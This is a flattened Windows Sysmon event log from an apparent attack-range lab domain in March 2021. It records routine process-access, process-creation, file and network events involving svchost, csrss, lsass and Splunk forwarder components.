16:28:19.131{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060914Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.131{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060913Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.131{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060912Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.131{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-51A3-6063-1901-00000000AF01}4980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060911Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.131{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51A3-6063-1901-00000000AF01}4980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001060910Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.131{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3156B0D180A68F89DBF91125B523664,SHA256=8FED00AFC6D2CAD890E35B3C4E575986B7D0BCB644132788804CE6E80DEF8D4C,IMPHASH=00000000000000000000000000000000falsetrue 154100x80000000000000001060909Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.133{7F8C56E7-51A3-6063-1901-00000000AF01}4980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245590Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:19.956{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F28A6E2E78C252C057F3DA9D09B4243,SHA256=D62497068E5C149D77121A63AA09307068A4344A79D5F6691A2FAFDDFAE38ACE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060938Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:17.903{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54777-false10.0.1.12-8000- 354300x80000000000000001060937Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:17.841{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54776-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 354300x80000000000000001060936Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:17.841{7F8C56E7-4E4C-6063-2F00-00000000AF01}988C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54776-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 23542300x80000000000000001060935Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:20.492{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8366554D32F71236C9C1A99262FBA394,SHA256=930FBA896F817BEB5574B7BA37B2513BEF703C43CB7D4EDC7F649079C8434956,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060934Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:20.492{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51A4-6063-1B01-00000000AF01}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060933Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:20.492{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060932Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:20.492{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060931Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:20.492{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060930Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:20.492{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060929Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:20.492{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-51A4-6063-1B01-00000000AF01}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060928Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:20.492{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51A4-6063-1B01-00000000AF01}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060927Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:20.493{7F8C56E7-51A4-6063-1B01-00000000AF01}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245606Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.972{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51A4-6063-AA22-00000000AF01}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245605Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.972{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245604Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.972{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245603Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.972{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245602Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.972{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245601Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.972{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245600Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.972{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245599Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.972{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245598Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.972{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245597Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.972{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 